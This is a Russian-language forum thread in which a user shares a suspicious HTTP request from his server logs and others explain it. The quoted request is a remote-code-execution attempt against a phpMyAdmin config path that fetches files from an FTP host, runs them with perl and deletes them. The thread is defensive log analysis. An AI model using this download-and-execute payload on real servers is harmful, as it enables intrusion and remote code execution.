подозрительный запрос

Discussion in 'Песочница' started by felix_v26, 5 May 2012.

  1. felix_v26

    felix_v26 New Member

    Joined:
    19 Mar 2011
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    сегодня в логах нашёл

    "GET /myadmin/config/config.inc.php?eval=system('echo cd /tmp;wget ftp://testing:testing@ip/apache_32.png;mv apache_32.png -O p2.txt;curl -O ftp://testing:testing@ip/apache_32.png;mv apache_32.png; mv apache_32.png p.txt;lynx -DUMP ftp://testing:testing@ip/apache_32.png;mvapache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 227 "-" "curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5"


    на скок это опасно?=)
     
    #1 felix_v26, 5 May 2012
  2. asn007

    asn007 New Member

    Joined:
    30 Apr 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    А что здесь непонятного? Скачал три подозрительных файла, выполнил их перлом, потер файлы. Лично я ничего хорошего в этом не вижу
     
    #2 asn007, 6 May 2012
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196


    Скорее попылатлся, так как.

    HTTP/1.1" 404

    Непонятно, с чего он взял, что в конфиге есть code exec?
     
    #3 попугай, 6 May 2012
  4. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    Скорее автосплойт какой то. Или ПенТест тулза. Остальных запрсов невидно толи из-за POST толи нам просто оних не сказали.
     
    #4 spider-intruder, 6 May 2012
(You must log in or sign up to post here.)